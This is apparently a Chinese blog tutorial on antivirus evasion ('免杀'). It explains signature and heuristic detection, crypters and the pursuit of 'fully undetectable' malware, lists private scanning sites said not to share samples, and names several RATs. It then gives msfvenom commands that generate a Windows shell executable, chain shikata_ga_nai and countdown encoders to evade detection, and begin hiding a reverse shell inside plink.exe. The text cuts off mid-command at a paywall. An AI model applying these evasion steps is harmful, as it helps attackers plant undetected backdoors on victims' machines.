本文介绍了免杀技术的基本概念,包括恶意软件的种类、防病毒软件的工作原理和局限性,以及免杀技术如何通过修改特征字符、加密和软件保护来逃避检测。还提到了目前的免杀现状,即黑客与AV厂商之间的拉锯战,并列举了一些常见的免杀工具和后门编写示例。
前言
本节开始学习免杀
免杀,避免被杀,使得恶意软件能进入目标机不被查杀
1、恶意软件
- 病毒、木马、蠕虫、键盘记录、僵尸程序、流氓软件、勒索软件、广告程序
- 在用户非自愿的情况下执行安装
- 出于某种恶意的目的:控制、窃取、勒索、偷窥、推送、攻击……
2、防病毒软件
恶意程序最主要的防护手段
- 称呼:杀毒软件/防病毒软件
- 功能:客户端/服务器/邮件防病毒
检测原理
- 基于二进制文件中特征签名的黑名单检测方法,这是最主要的方法
- 基于行为的分析方法(启发式)
事后手段
- 永远落后于病毒发展
3、免杀技术
修改二进制文件中的特征字符
- 知道黑名单里的特征
- 进行替换、擦除、修改
加密技术(crypter)
- 通过加密使得特征字符不可读,从而逃避AV 检测
- 运行时分片分段的解密执行,注入进程或 AV 不检查的无害文件中
防病毒软件的检测
- 既检查恶意程序本身的特征字符
- 也检查加密器 cripter 的特征字符
4、当前现状
恶意软件制造者
- 编写私有的 RAT 软件,避免普遍被 AV 所知的特征字符,使用独有 crypter 软件加密恶意程序,处事低调,尽量避免被发现
- 没有能力自己编写恶意代码的黑客,通过直接修改特征码的方式免杀
- Fully UnDetectable 是最高追求 (FUD)
AV 厂商
- 广泛采集样本,尽快发现出现的病毒程序,更新病毒库
- 一般新的恶意软件安全 UD 窗口期是一周左右
- 与恶意软件制造者永无休止的拉锯战
- 新的启发式检测技术尚有待完善(误杀漏杀)
一些在线站点
单一 AV 厂商的病毒库很难达到 100% 覆盖
这两个在线多引擎查杀网站与 AV 查杀共享信息
- https://www.virustotal.com/
接口被某些国家的AV软禁免费利用,没有自己的病毒库 - http://www.virscan.org/
这两个是搞黑的在线多引擎查毒站
- https://nodistribute.com/
- http://viruscheckmate.com/check/
常用的 RAT 软件
- 灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore
5、msf的一些例子
#生成反弹shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.1.119 lport=4444 -a x86 --platform win -f exe -o a.exe
#-p是payload,-a是系统架构,--platform是平台,-f是软件格式,-o是命名
#加密编码反弹shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.1.119 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe
#-e指定加密模块,-i是加密次数,这里重复加密,-b是特殊字符过滤
#对比两者里面可读内容
string a.exe
string b.exe
#在上面的网站里查下这两个,大概能有50%查出
#利用模板隐藏shell
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
